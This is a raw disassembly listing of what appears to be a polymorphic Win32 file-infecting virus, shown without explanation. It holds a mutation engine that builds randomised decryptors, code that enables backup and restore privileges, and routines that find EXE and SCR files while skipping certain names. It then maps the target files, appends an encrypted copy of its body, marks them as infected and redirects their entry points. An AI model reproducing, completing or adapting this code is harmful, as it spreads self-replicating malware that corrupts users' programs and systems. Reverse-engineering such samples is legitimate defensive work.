test dword ptr [ebp+1039C0h], 8
jz short loc_31443BDD
call sub_3144376D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_31443B88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_31443BD5
; ---------------------------------------------------------------------------
loc_31443B88: ; CODE XREF: UPX2:31443B7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_31443BA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_31443BBA
; ---------------------------------------------------------------------------
loc_31443BA5: ; CODE XREF: UPX2:31443B92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_31443BBA: ; CODE XREF: UPX2:31443BA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_31443BCD
add ah, 8
loc_31443BCD: ; CODE XREF: UPX2:31443BC8�j
or ah, [ebp+1039BAh]
stosw
loc_31443BD5: ; CODE XREF: UPX2:31443B86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_31443BDD: ; CODE XREF: UPX2:31443B6A�j
call sub_3144376D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_31443BFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_3144376D
loc_31443BFC: ; CODE XREF: UPX2:31443BEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_31443C28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_31443C2D
; ---------------------------------------------------------------------------
loc_31443C28: ; CODE XREF: UPX2:31443C0F�j
call sub_314437DF
loc_31443C2D: ; CODE XREF: UPX2:31443C26�j
call sub_3144376D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_31443C49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_31443C58
; ---------------------------------------------------------------------------
loc_31443C49: ; CODE XREF: UPX2:31443C3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_31443C58: ; CODE XREF: UPX2:31443C47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_31443C93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_31443C8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31443C92
; ---------------------------------------------------------------------------
loc_31443C8A: ; CODE XREF: UPX2:31443C6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_31443C92: ; CODE XREF: UPX2:31443C88�j
stosb
loc_31443C93: ; CODE XREF: UPX2:31443C62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_31443CAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_31443CB7
; ---------------------------------------------------------------------------
loc_31443CAF: ; CODE XREF: UPX2:31443C9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_31443CB7: ; CODE XREF: UPX2:31443CAD�j
stosb
call sub_3144376D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_31443CF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_31443D0B
mov cl, 77h
jmp short loc_31443D0B
; ---------------------------------------------------------------------------
loc_31443CF0: ; CODE XREF: UPX2:31443CC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_31443D0B: ; CODE XREF: UPX2:31443CEA�j
; UPX2:31443CEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_3144376D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_31443D5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_31443D5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_31443D51
call sub_314436FB
call sub_3144376D
loc_31443D51: ; CODE XREF: UPX2:31443D45�j
call sub_31443727
call sub_3144376D
loc_31443D5B: ; CODE XREF: UPX2:31443D2D�j
; UPX2:31443D39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_31443D6F
mov al, 0C9h
stosb
call sub_3144376D
loc_31443D6F: ; CODE XREF: UPX2:31443D65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31443DA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_3144376D
mov al, 61h
stosb
call sub_3144376D
loc_31443DA5: ; CODE XREF: UPX2:31443D79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_3144376D
test dword ptr [ebp+1039C0h], 20h
jz short loc_31443E31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_31443DED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_314437DF
call sub_3144376D
mov al, 0C3h
stosb
call sub_3144376D
loc_31443DED: ; CODE XREF: UPX2:31443DCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_3144376D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_31443E20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_31443E2A
; ---------------------------------------------------------------------------
loc_31443E20: ; CODE XREF: UPX2:31443E12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_31443E2A: ; CODE XREF: UPX2:31443E1E�j
stosw
call sub_3144376D
loc_31443E31: ; CODE XREF: UPX2:31443DC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_31443E9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_31443E66
lea eax, [ebp+1039B8h]
loc_31443E5E: ; CODE XREF: UPX2:31443E64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_31443E5E
loc_31443E66: ; CODE XREF: UPX2:31443E56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_31443E7B
mov ax, 0C031h
stosw
loc_31443E7B: ; CODE XREF: UPX2:31443E73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_31443E94
mov ax, 0C031h
stosw
loc_31443E94: ; CODE XREF: UPX2:31443E8C�j
mov al, 0C3h
stosb
call sub_3144376D
loc_31443E9C: ; CODE XREF: UPX2:31443E3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_31443EB4
push edi
sub edi, eax
pop eax
jmp short loc_31443ECD
; ---------------------------------------------------------------------------
loc_31443EB4: ; CODE XREF: UPX2:31443EAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_31443ECD: ; CODE XREF: UPX2:31443EB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_31443EED
neg eax
loc_31443EED: ; CODE XREF: UPX2:31443EE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_31443EF1 proc near ; CODE XREF: sub_3144445B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_314440D9
call near ptr loc_31443F11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_31443F11: ; CODE XREF: sub_31443EF1+F�p
add bh, bh
sub_31443EF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_31443414
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_31443414
mov edi, [ebp+1042F4h]
push esi
call sub_31443414
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_314440D9
jz loc_314440D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_314440AA
loc_31443F8B: ; CODE XREF: sub_314440AA+29�j
lodsb
cmp al, 0E8h
jnz loc_31444036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call sub_31443414
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_31443FB9
cmp eax, [edi+0Ch]
jnb loc_314440D2
jmp short loc_31443FC5
; ---------------------------------------------------------------------------
loc_31443FB9: ; CODE XREF: sub_314440AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_314440D2
loc_31443FC5: ; CODE XREF: sub_314440AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_314440D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_31443414
cmp [ebp+1042F4h], edi
jnz loc_314440D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_314440D2
cmp eax, [edi+8]
jnb loc_314440D2
loc_3144400E: ; CODE XREF: sub_314440AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_314440E8
jmp loc_314440D2
; ---------------------------------------------------------------------------
loc_31444036: ; CODE XREF: sub_314440AA-11C�j
cmp al, 0FFh
jnz loc_314440D2
cmp byte ptr [esi], 15h
jnz loc_314440D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_31443414
cmp [ebp+1042F4h], edi
jnz short loc_314440D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_3144407F
cmp eax, [ebp+10431Ch]
jb short loc_314440E8
loc_3144407F: ; CODE XREF: sub_314440AA-35�j
cmp eax, 70000000h
jb short loc_314440BD
call sub_314440AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_314440A9
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_314440C4
; ---------------------------------------------------------------------------
locret_314440A9: ; CODE XREF: sub_314440AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_314440AA
; =============== S U B R O U T I N E =======================================
sub_314440AA proc near ; CODE XREF: sub_314440AA-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 31443F8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call sub_3144351B
popa
loc_314440BD: ; CODE XREF: sub_314440AA-26�j
test eax, 80000000h
jnz short loc_314440D2
loc_314440C4: ; CODE XREF: sub_314440AA-3�j
sub eax, [edi+0Ch]
jb short loc_314440D2
cmp eax, [edi+8]
jb loc_3144400E
loc_314440D2: ; CODE XREF: sub_314440AA-F9�j
; sub_314440AA-EB�j ...
dec ecx
jnz loc_31443F8B
loc_314440D9: ; CODE XREF: sub_31443EF1+9�j
; UPX2:31443F73�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_3144412A
; ---------------------------------------------------------------------------
loc_314440E8: ; CODE XREF: sub_314440AA-7F�j
; sub_314440AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3144412A: ; CODE XREF: sub_314440AA+3C�j
pop edi
pop esi
retn
sub_314440AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144412D proc near ; CODE XREF: UPX2:3144442E�p
; FUNCTION CHUNK AT 31444257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_31444257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_31444257
call sub_314425AF
call near ptr loc_31444168+5
push ebx
db 65h
jz short near ptr unk_314441A6
imul ebp, [ebp+53h], 72756365h
loc_31444168: ; CODE XREF: sub_3144412D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_3144412D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_3144419C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_31444203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3144419C: ; CODE XREF: UPX2:3144417F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_314441A6 db 0 ; CODE XREF: sub_3144412D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_31444203: ; CODE XREF: UPX2:3144418D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_3144412D
loc_31444257: ; CODE XREF: sub_3144412D+A�j
; sub_3144412D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3144412D
; =============== S U B R O U T I N E =======================================
sub_31444259 proc near ; CODE XREF: UPX2:31444427�p
; UPX2:31444433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_3144432A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_3144432A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_314448AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_3144489F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_3144489F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_3144489F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_31444877
mov [ebp+1042B4h], eax
locret_3144432A: ; CODE XREF: sub_31444259+10�j
; sub_31444259+27�j ...
retn
sub_31444259 endp
; ---------------------------------------------------------------------------
loc_3144432B: ; CODE XREF: sub_3144445B+188�p
; sub_3144445B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_31444370 proc near ; CODE XREF: sub_3144445B:loc_314444D0�p
; sub_3144445B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_31444375: ; CODE XREF: sub_31444370+23�j
jecxz short locret_314443AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_314443AC
cmp dword ptr [edx+0Ch], 1
jb short loc_31444375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_314443AC: ; CODE XREF: sub_31444370:loc_31444375�j
; sub_31444370+1D�j ...
retn
sub_31444370 endp
; =============== S U B R O U T I N E =======================================
sub_314443AD proc near ; CODE XREF: UPX2:31444445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_314443AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_314443BA: ; CODE XREF: UPX2:314443DB�j
mov ecx, edi
jmp short loc_314443C9
; ---------------------------------------------------------------------------
lea edi, [ebp+104184h]
cld
loc_314443C5: ; CODE XREF: UPX2:314443D7�j
mov ebx, edi
xor ecx, ecx
loc_314443C9: ; CODE XREF: UPX2:314443BC�j
; UPX2:314443DF�j
lodsb
cmp al, 61h
jb short loc_314443D4
cmp al, 7Ah
ja short loc_314443D4
sub al, 20h
loc_314443D4: ; CODE XREF: UPX2:314443CC�j
; UPX2:314443D0�j
stosb
cmp al, 5Ch
jz short loc_314443C5
cmp al, 2Eh
jz short loc_314443BA
cmp al, 0
jnz short loc_314443C9
jecxz short locret_314443AC
mov eax, [ecx]
cmp eax, 455845h
jz short loc_314443F7
cmp eax, 524353h
jnz locret_3144432A
loc_314443F7: ; CODE XREF: UPX2:314443EA�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3144432A
cmp eax, 4E554357h
jz locret_3144432A
cmp eax, 32334357h
jz locret_3144432A
cmp eax, 4F545350h
jz locret_3144432A
xor ebx, ebx
call sub_31444259
jnz short loc_3144443E
call sub_3144412D
call sub_31444259
jz locret_3144432A
loc_3144443E: ; CODE XREF: UPX2:3144442C�j
xor edx, edx
call sub_3144445B
call sub_314443AD
call $+5
pop ebp
sub ebp, 10344Fh
jmp loc_31444855
; =============== S U B R O U T I N E =======================================
sub_3144445B proc near ; CODE XREF: UPX2:31444440�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042B4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_31444855
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_31444855
test dword ptr [ebx+16h], 2000h
jnz loc_31444855
test byte ptr [ebx+5Ch], 2
jz loc_31444855
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_31444855
cmp eax, 20202020h
jz loc_31444855
mov ecx, [ebx+0C8h]
jecxz short loc_314444D0
push ecx
call sub_31443414
add ecx, [ebp+1042F8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_314444D0: ; CODE XREF: sub_3144445B+5D�j
call sub_31444370
jb loc_31444855
and dword ptr [ebp+1042FCh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_314444F0
xor eax, eax
jmp short loc_314444F5
; ---------------------------------------------------------------------------
loc_314444F0: ; CODE XREF: sub_3144445B+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_314444F5: ; CODE XREF: sub_3144445B+93�j
mov [ebp+1042BCh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_31442B50+43h
xor [ebp+1039BEh], dl
mov cl, 20h
xor [ebp+1039BFh], dh
loc_31444517: ; CODE XREF: sub_3144445B+D5�j
push 20h
dec cl
pop eax
js short loc_31444532
call near ptr dword_31442B50+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039C0h], edx
jmp short loc_31444517
; ---------------------------------------------------------------------------
loc_31444532: ; CODE XREF: sub_3144445B+C1�j
test dword ptr [ebp+1039C0h], 2000000h
jz short loc_31444560
test dword ptr [ebp+1039C0h], 3
jnz short loc_31444556
and dword ptr [ebp+1039C0h], 0F7FFFFFFh
jmp short loc_31444560
; ---------------------------------------------------------------------------
loc_31444556: ; CODE XREF: sub_3144445B+ED�j
or dword ptr [ebp+1039C0h], 10000000h
loc_31444560: ; CODE XREF: sub_3144445B+E1�j
; sub_3144445B+F9�j ...
push 6
pop ecx
loc_31444566: ; CODE XREF: sub_3144445B+129�j
push 6
pop eax
call near ptr dword_31442B50+43h
mov al, [ebp+1039B8h]
xchg al, [edx+ebp+1039B8h]
mov [ebp+1039B8h], al
loop loc_31444566
test dword ptr [ebp+1039C0h], 8
jnz short loc_3144459B
cmp byte ptr [ebp+1039BAh], 1
jz short loc_31444560
loc_3144459B: ; CODE XREF: sub_3144445B+135�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_314445C2
cmp byte ptr [ebp+1039B8h], 5
jz short loc_31444560
cmp byte ptr [ebp+1039B9h], 5
jz short loc_31444560
cmp byte ptr [ebp+1039BAh], 5
jz short loc_31444560
loc_314445C2: ; CODE XREF: sub_3144445B+14A�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_314445D7
cmp byte ptr [ebp+1039B8h], 2
ja short loc_31444560
loc_314445D7: ; CODE XREF: sub_3144445B+171�j
and dword ptr [ebp+104300h], 0
call loc_31443855
call loc_3144432B
call sub_3144485E
mov ebx, [ebp+1042B8h]
add ebx, [ebp+1042BCh]
call sub_31444259
jz loc_31444855
mov esi, [ebp+1042B4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_31444370
jb loc_31444855
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_3144464B
mov [ebp+104304h], edi
lea esi, [ebp+1039CCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3144464B: ; CODE XREF: sub_3144445B+1DA�j
push edi
mov ecx, 0A73h
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3144465F
rep movsb
loc_3144465F: ; CODE XREF: sub_3144445B+200�j
test dword ptr [ebp+1039C0h], 20000000h
jz loc_3144471D
push dword ptr [ebx+28h]
call sub_31443414
mov edx, [ebp+1042F4h]
test edx, edx
jz loc_3144471D
mov esi, [ebp+1042B4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3144469C
xor ecx, ecx
loc_3144469C: ; CODE XREF: sub_3144445B+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_31444703
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042C8h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_314446DC
neg dword ptr [eax]
loc_314446DC: ; CODE XREF: sub_3144445B+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+104300h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039C0h], 40h
jz short loc_314446FA
neg dword ptr [eax]
loc_314446FA: ; CODE XREF: sub_3144445B+29B�j
push ecx
call loc_3144432B
pop ecx
jmp short loc_3144470F
; ---------------------------------------------------------------------------
loc_31444703: ; CODE XREF: sub_3144445B+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3144470F: ; CODE XREF: sub_3144445B+2A6�j
lea esi, [ebp+1039CCh]
mov [ebp+104304h], edi
rep movsb
loc_3144471D: ; CODE XREF: sub_3144445B+20E�j
; sub_3144445B+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039BEh]
jnz short loc_31444736
imul edx, 12345678h
loc_31444736: ; CODE XREF: sub_3144445B+2D3�j
mov [eax-19h], dx
call sub_31442120
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039C0h], 20000000h
lea eax, [ecx+5]
jnz short loc_31444768
mov [ebp+104300h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_31444768: ; CODE XREF: sub_3144445B+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F7Ch], 1
jz short loc_31444784
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_31444784: ; CODE XREF: sub_3144445B+320�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_31444797
push edx
call sub_31443EF1
pop edx
loc_31444797: ; CODE XREF: sub_3144445B+333�j
mov ecx, [ebp+104300h]
jecxz short loc_314447A4
mov [ebx+28h], ecx
jmp short loc_314447B1
; ---------------------------------------------------------------------------
loc_314447A4: ; CODE XREF: sub_3144445B+342�j
mov ecx, [ebp+1042FCh]
jecxz short loc_314447AE
jmp short loc_314447B1
; ---------------------------------------------------------------------------
loc_314447AE: ; CODE XREF: sub_3144445B+34F�j
mov ecx, [ebx+28h]
loc_314447B1: ; CODE XREF: sub_3144445B+347�j
; sub_3144445B+351�j
test dword ptr [ebp+1039C0h], 3
jz short loc_314447D1
mov eax, [ebp+104304h]
add ecx, [ebp+1042ECh]
add eax, [ebp+1042E8h]
add [eax], ecx
loc_314447D1: ; CODE XREF: sub_3144445B+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042B8h]
cmp [edx+8], ecx
jnb short loc_314447E2
mov [edx+8], ecx
loc_314447E2: ; CODE XREF: sub_3144445B+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042C0h]
push 29CCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039BEh]
test dword ptr [ebp+1039C0h], 20000000h
jz short loc_31444813
add ecx, [ebp+101069h]
loc_31444813: ; CODE XREF: sub_3144445B+3B0�j
mov dh, 0
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_31444835
inc dh
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_31444835
mov dh, [ebp+1039BFh]
loc_31444835: ; CODE XREF: sub_3144445B+3C4�j
; sub_3144445B+3D2�j
test dword ptr [ebp+1039C0h], 4000h
jnz short loc_3144484C
loc_31444841: ; CODE XREF: sub_3144445B+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_31444841
jmp short loc_31444855
; ---------------------------------------------------------------------------
loc_3144484C: ; CODE XREF: sub_3144445B+3E4�j
; sub_3144445B+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3144484C
loc_31444855: ; CODE XREF: UPX2:31444456�j
; sub_3144445B+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3144445B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144485E proc near ; CODE XREF: sub_3144445B+18D�p
cmp dword ptr [ebp+104298h], 0
jz locret_3144432A
push dword ptr [ebp+1042B4h]
call dword ptr [ebp+103EEEh]
loc_31444877: ; CODE XREF: sub_31444259+C5�j
